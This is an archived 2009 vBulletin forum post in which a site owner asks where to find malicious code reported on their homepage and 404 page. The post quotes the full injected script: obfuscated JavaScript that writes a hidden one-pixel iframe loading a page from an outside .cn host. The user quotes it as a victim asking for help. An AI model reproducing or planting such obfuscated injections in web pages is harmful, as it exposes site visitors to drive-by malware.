vb.org Archive - View Single Post

raja811 · #8 03-14-2009, 03:37 PM

i get this message
The malicious code is on your homepage and it shows up in your 404 page. The code looks like this

Rex Swain's HTTP Viewer<SCRIPT·TYPE="text/javascript"·LANGUAGE="JavaScript1.2">document.wri te(''+String.fromCharCode(60)+S tring.fromCharCode(105)+''+'f'+unescape('%72%61%6D ')+'e·id'+unescape('%3D')+unes cape('%22%30')+'938f'+unescape('%34%34%61%63')+une scape('%63%37')+unescape('%65' )+String.fromCharCode(97)+String.fromCharCode(53)+ String.fromCharCode(101)+Strin g.fromCharCode(102)+''+unescape('%34')+unescape('% 33%30%33%30')+unescape('%38%31 ')+String.fromCharCode(54)+String.fromCharCode(51) +String.fromCharCode(48)+''+St ring.fromCharCode(100)+''+String.fromCharCode(99)+ String.fromCharCode(98)+String .fromCharCode(50)+''+'fa"·'+'nam'+String.fromChar Code(101)+String.fromCharCode(6 1)+''+unescape('%22%66%30')+'f'+String.fromCharCod e(100)+String.fromCharCode(54) +''+unescape('%31%61%61%65')+'91'+'7'+String.fromC harCode(48)+String.fromCharCod e(102)+String.fromCharCode(97)+''+'d03e'+String.fr omCharCode(55)+String.fromChar Code(53)+''+'c9b'+'a6de'+unescape('%66%34%37')+Str ing.fromCharCode(97)+''+'"··w' +String.fromCharCode(105)+''+String.fromCharCode(1 00)+''+'t'+String.fromCharCode (104)+String.fromCharCode(61)+''+'1·'+String.from CharCode(104)+String.fromCharCo de(101)+String.fromCharCode(105)+''+unescape('%67% 68%74%3D')+String.fromCharCode (49)+String.fromCharCode(32)+''+unescape('%66')+'r am'+String.fromCharCode(101)+S tring.fromCharCode(98)+''+'orde'+'r=0·'+unescape( '%73%72')+unescape('%63%3D')+un escape('%22')+unescape('%68%74%74%70')+':/'+unescape('%2F%74%68%65')+String.fromCharCode(104 )+String.fromCharCode(117)+Str ing.fromCharCode(103)+String.fromCharCode(101)+''+ 'tit'+'s'+'top.'+'cn/d'+'on'+'tsto'+unescape('%70%2E%68')+'tml"'+unesca pe('%3E')+String.fromCharCode( 60)+''+unescape('%2F%69%66')+unescape('%72')+Strin g.fromCharCode(97)+String.from CharCode(109)+String.fromCharCode(101)+String.from CharCode(62)+''+'');</SCRIPT>

but i don't know where i can find this ?

X vBulletin 3.8.12 by vBS Debug Information
Page Generation 0.01391 seconds Memory Usage 1,764KB Queries Executed 11 (?)
More Information
Template Usage: (1)SHOWTHREAD_SHOWPOST (1)ad_footer_end (1)ad_footer_start (1)ad_header_end (1)ad_header_logo (1)ad_navbar_below (1)footer (1)gobutton (1)header (1)headinclude (6)option (1)post_thanks_box (1)post_thanks_button (1)post_thanks_javascript (1)post_thanks_navbar_search (1)post_thanks_postbit_info (1)postbit (1)postbit_onlinestatus (1)postbit_wrapper (1)spacer_close (1)spacer_open Phrase Groups Available: global postbit reputationlevel showthread	Included Files: ./showpost.php ./global.php ./includes/init.php ./includes/class_core.php ./includes/config.php ./includes/functions.php ./includes/class_hook.php ./includes/modsystem_functions.php ./includes/functions_bigthree.php ./includes/class_postbit.php ./includes/class_bbcode.php ./includes/functions_reputation.php ./includes/functions_post_thanks.php Hooks Called: init_startup init_startup_session_setup_start init_startup_session_setup_complete cache_permissions fetch_postinfo_query fetch_postinfo fetch_threadinfo_query fetch_threadinfo fetch_foruminfo style_fetch cache_templates global_start parse_templates global_setup_complete showpost_start bbcode_fetch_tags bbcode_create postbit_factory showpost_post postbit_display_start post_thanks_function_post_thanks_off_start post_thanks_function_post_thanks_off_end post_thanks_function_fetch_thanks_start post_thanks_function_fetch_thanks_end post_thanks_function_thanked_already_start post_thanks_function_thanked_already_end fetch_musername postbit_imicons bbcode_parse_start bbcode_parse_complete_precache bbcode_parse_complete postbit_display_complete post_thanks_function_can_thank_this_post_start showpost_complete
Messages: